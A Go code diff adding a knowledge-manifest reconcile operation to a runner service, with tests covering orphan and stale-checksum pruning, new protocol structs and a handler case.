+func TestReconcileKnowledgeManifest_AllMatch(t *testing.T) { + ws := newTestEnvironment(t) + ctx := context.Background() + + stageOne(t, ws, "knowledge/account/runbook.md", "sum-a", "A") + stageOne(t, ws, "knowledge/team_42/escalation.md", "sum-b", "B") + + res, err := ws.ReconcileKnowledgeManifest(ctx, &protocol.ReconcileKnowledgeManifestArgs{ + Files: []protocol.KnowledgeManifestEntry{ + {RelPath: "knowledge/account/runbook.md", Checksum: "sum-a"}, + {RelPath: "knowledge/team_42/escalation.md", Checksum: "sum-b"}, + }, + }) + require.NoError(t, err) + assert.Empty(t, res.Pruned) + assert.Equal(t, 2, res.KeptCount) + assert.Equal(t, 0, res.StaleCount) + assert.Empty(t, res.NeedsStage, "everything matches; caller should not need to stage anything") + + // Files still on disk; sentinel still has both entries. + assert.Equal(t, "A", fileContent(t, ws.Root(), "knowledge/account/runbook.md")) + assert.Equal(t, "B", fileContent(t, ws.Root(), "knowledge/team_42/escalation.md")) + sentinel := readSentinelMap(t, ws.Root()) + assert.Equal(t, "sum-a", sentinel["knowledge/account/runbook.md"]) + assert.Equal(t, "sum-b", sentinel["knowledge/team_42/escalation.md"]) +} + +// Reconcile case 2: a staged file is missing from the manifest entirely (the +// pack-level deletion case). The runner deletes the file and drops it from +// the sentinel; the surviving file is left alone. 
+func TestReconcileKnowledgeManifest_PrunesOrphans(t *testing.T) { + ws := newTestEnvironment(t) + ctx := context.Background() + + stageOne(t, ws, "knowledge/account/runbook.md", "sum-a", "A") + stageOne(t, ws, "knowledge/account/old.md", "sum-old", "old body") + + res, err := ws.ReconcileKnowledgeManifest(ctx, &protocol.ReconcileKnowledgeManifestArgs{ + Files: []protocol.KnowledgeManifestEntry{ + {RelPath: "knowledge/account/runbook.md", Checksum: "sum-a"}, + }, + }) + require.NoError(t, err) + assert.ElementsMatch(t, []string{"knowledge/account/old.md"}, res.Pruned) + assert.Equal(t, 1, res.KeptCount) + assert.Equal(t, 0, res.StaleCount, "orphan should not count as stale") + assert.Empty(t, res.NeedsStage, "the surviving file is current and the orphan is not in the manifest") + + _, err = os.Stat(filepath.Join(ws.Root(), "knowledge/account/old.md")) + assert.True(t, os.IsNotExist(err), "orphan should be deleted") + assert.Equal(t, "A", fileContent(t, ws.Root(), "knowledge/account/runbook.md")) + + sentinel := readSentinelMap(t, ws.Root()) + _, hasOld := sentinel["knowledge/account/old.md"] + assert.False(t, hasOld, "sentinel must not retain pruned entry") + assert.Equal(t, "sum-a", sentinel["knowledge/account/runbook.md"]) +} + +// Reconcile case 3: a file's checksum drifted upstream (someone edited it in +// the UI). The runner deletes the on-disk copy so the next read goes through +// Safari's lazy installer and gets the fresh bytes from S3. 
+func TestReconcileKnowledgeManifest_PrunesStaleChecksum(t *testing.T) { + ws := newTestEnvironment(t) + ctx := context.Background() + + stageOne(t, ws, "knowledge/account/runbook.md", "sum-old", "old content") + + res, err := ws.ReconcileKnowledgeManifest(ctx, &protocol.ReconcileKnowledgeManifestArgs{ + Files: []protocol.KnowledgeManifestEntry{ + {RelPath: "knowledge/account/runbook.md", Checksum: "sum-new"}, + }, + }) + require.NoError(t, err) + assert.ElementsMatch(t, []string{"knowledge/account/runbook.md"}, res.Pruned) + assert.Equal(t, 0, res.KeptCount) + assert.Equal(t, 1, res.StaleCount, "checksum drift should count as stale") + assert.ElementsMatch(t, []string{"knowledge/account/runbook.md"}, res.NeedsStage, + "after pruning the stale copy, caller must restage the fresh bytes") + + _, err = os.Stat(filepath.Join(ws.Root(), "knowledge/account/runbook.md")) + assert.True(t, os.IsNotExist(err), "stale file should be deleted") + + sentinel := readSentinelMap(t, ws.Root()) + _, hasEntry := sentinel["knowledge/account/runbook.md"] + assert.False(t, hasEntry, "sentinel must drop the stale entry so a refetch resets it") +} + +// Reconcile case 4: an empty manifest is the "no packs are active anymore" +// signal — every staged file should be pruned. +func TestReconcileKnowledgeManifest_EmptyManifestPrunesEverything(t *testing.T) { + ws := newTestEnvironment(t) + ctx := context.Background() + + stageOne(t, ws, "knowledge/account/a.md", "sa", "a") + stageOne(t, ws, "knowledge/team_5/b.md", "sb", "b") + + res, err := ws.ReconcileKnowledgeManifest(ctx, &protocol.ReconcileKnowledgeManifestArgs{Files: nil}) + require.NoError(t, err) + assert.ElementsMatch(t, []string{"knowledge/account/a.md", "knowledge/team_5/b.md"}, res.Pruned) + assert.Equal(t, 0, res.KeptCount) + + sentinel := readSentinelMap(t, ws.Root()) + assert.Empty(t, sentinel) +} + +// Reconcile case 5: an operator drop — a file appeared on disk that Safari +// never staged (so it has no sentinel entry). 
It must be pruned because it +// isn't in the manifest, even though there's no checksum to compare against. +func TestReconcileKnowledgeManifest_PrunesUnsentineledFile(t *testing.T) { + ws := newTestEnvironment(t) + ctx := context.Background() + + // Drop a file directly on disk, bypassing StageKnowledgeFiles → no sentinel. + scopeDir := filepath.Join(ws.Root(), "knowledge", "account") + require.NoError(t, os.MkdirAll(scopeDir, 0o755)) + require.NoError(t, os.WriteFile(filepath.Join(scopeDir, "manual.md"), []byte("hand-placed"), 0o644)) + + res, err := ws.ReconcileKnowledgeManifest(ctx, &protocol.ReconcileKnowledgeManifestArgs{Files: nil}) + require.NoError(t, err) + assert.ElementsMatch(t, []string{"knowledge/account/manual.md"}, res.Pruned) + + _, err = os.Stat(filepath.Join(scopeDir, "manual.md")) + assert.True(t, os.IsNotExist(err)) +} + +// Reconcile case 6a: cold runner — manifest declares files that aren't on +// disk yet. Nothing to prune, but every entry comes back in NeedsStage so +// Safari can do a one-shot eager fetch+stage at session start. +func TestReconcileKnowledgeManifest_FlagsMissingForEagerStage(t *testing.T) { + ws := newTestEnvironment(t) + ctx := context.Background() + + res, err := ws.ReconcileKnowledgeManifest(ctx, &protocol.ReconcileKnowledgeManifestArgs{ + Files: []protocol.KnowledgeManifestEntry{ + {RelPath: "knowledge/account/DUTY.md", Checksum: "duty"}, + {RelPath: "knowledge/account/runbook.md", Checksum: "rb"}, + }, + }) + require.NoError(t, err) + assert.Empty(t, res.Pruned) + assert.Equal(t, 0, res.KeptCount) + assert.ElementsMatch(t, + []string{"knowledge/account/DUTY.md", "knowledge/account/runbook.md"}, + res.NeedsStage, + ) +} + +// Reconcile case 6: the sentinel filename and unrecognized scope dirs must be +// invisible to the walker — no spurious "prune" attempts on infra files. 
+func TestReconcileKnowledgeManifest_IgnoresSentinelAndUnknownDirs(t *testing.T) {
+	ws := newTestEnvironment(t)
+	ctx := context.Background()
+
+	stageOne(t, ws, "knowledge/account/keep.md", "sk", "keep")
+
+	// Plant an unknown-scope directory and an arbitrary file in the knowledge
+	// root; neither should appear in the prune list.
+	rogueScope := filepath.Join(ws.Root(), "knowledge", "rogue_scope")
+	require.NoError(t, os.MkdirAll(rogueScope, 0o755))
+	require.NoError(t, os.WriteFile(filepath.Join(rogueScope, "stuff.md"), []byte("x"), 0o644))
+
+	res, err := ws.ReconcileKnowledgeManifest(ctx, &protocol.ReconcileKnowledgeManifestArgs{
+		Files: []protocol.KnowledgeManifestEntry{
+			{RelPath: "knowledge/account/keep.md", Checksum: "sk"},
+		},
+	})
+	require.NoError(t, err)
+	assert.Empty(t, res.Pruned, "unknown scope dirs and the sentinel must not be touched")
+	assert.Equal(t, 1, res.KeptCount)
+
+	// Rogue file is still there — reconcile is intentionally narrow, only the
+	// validated scope dirs (`account`, `team_<id>`) are in scope.
+	_, err = os.Stat(filepath.Join(rogueScope, "stuff.md"))
+	assert.NoError(t, err)
+}
diff --git a/protocol/messages.go b/protocol/messages.go
index f7db45b..30f3dd4 100644
--- a/protocol/messages.go
+++ b/protocol/messages.go
@@ -115,8 +115,9 @@ const (
 	TaskOpMCPCall      TaskOperation = "mcp_call"
 	TaskOpMCPListTools TaskOperation = "mcp_list_tools"
 	TaskOpSyncSkill    TaskOperation = "sync_skill"
-	TaskOpStageKnowledgeFiles  TaskOperation = "stage_knowledge_files"
-	TaskOpDeleteKnowledgeFiles TaskOperation = "delete_knowledge_files"
+	TaskOpStageKnowledgeFiles        TaskOperation = "stage_knowledge_files"
+	TaskOpDeleteKnowledgeFiles       TaskOperation = "delete_knowledge_files"
+	TaskOpReconcileKnowledgeManifest TaskOperation = "reconcile_knowledge_manifest"
 )
 
 // TaskRequestPayload is the payload for task request messages.
@@ -408,3 +409,39 @@ type DeleteKnowledgeFilesArgs struct {
 type DeleteKnowledgeFilesResult struct {
 	Success bool `json:"success"`
 }
+
+// KnowledgeManifestEntry is one (rel_path, checksum) pair in a reconcile manifest.
+// rel_path uses the same `knowledge/<scope>/<filename>` shape as StageKnowledgeFiles
+// so the runner-side validator is shared.
+type KnowledgeManifestEntry struct {
+	RelPath  string `json:"rel_path"`
+	Checksum string `json:"checksum"`
+}
+
+// ReconcileKnowledgeManifestArgs supplies the canonical view of which knowledge
+// files should exist on disk and at what checksum. The runner deletes anything
+// not in the manifest (orphan prune) and anything whose on-disk checksum
+// disagrees (stale prune); the result's NeedsStage field tells the caller
+// which manifest entries the runner does NOT have cached so the caller can
+// bulk-stage them in one follow-up batch (skills-style eager materialization).
+type ReconcileKnowledgeManifestArgs struct {
+	Files []KnowledgeManifestEntry `json:"files"`
+}
+
+// ReconcileKnowledgeManifestResult reports the diff outcome plus the list of
+// entries the caller still needs to push.
+//
+// Pruned lists every rel_path the runner removed (orphans + stale together).
+// StaleCount is the subset of Pruned whose rel_path was in the manifest but
+// had a divergent checksum — useful for spotting upstream edits.
+// KeptCount counts files left untouched because their checksum already matched.
+// NeedsStage enumerates every manifest entry the runner does NOT have on disk
+// after the prune step. The caller (Safari) materializes these by fetching
+// from S3 and calling StageKnowledgeFiles. Empty when the runner is already
+type ReconcileKnowledgeManifestResult struct { + Pruned []string `json:"pruned,omitempty"` + KeptCount int `json:"kept_count"` + StaleCount int `json:"stale_count"` + NeedsStage []string `json:"needs_stage,omitempty"` +} diff --git a/ws/handler.go b/ws/handler.go index 1ac69eb..1452d79 100644 --- a/ws/handler.go +++ b/ws/handler.go @@ -270,6 +270,14 @@ func (h *Handler) executeTask(ctx context.Context, req *protocol.TaskRequestPayl logger.Info("deleting knowledge files", "count", len(args.RelPaths)) return h.ws.DeleteKnowledgeFiles(ctx, args) + case protocol.TaskOpReconcileKnowledgeManifest: + args, err := parseArgs[protocol.ReconcileKnowledgeManifestArgs](req.Args) + if err != nil { + return nil, fmt.Errorf("invalid reconcile_knowledge_manifest args: %w", err) + } + logger.Info("reconciling knowledge manifest", "count", len(args.Files)) + return h.ws.ReconcileKnowledgeManifest(ctx, args) + default: return nil, fmt.Errorf("unknown operation: %s", req.Operation) }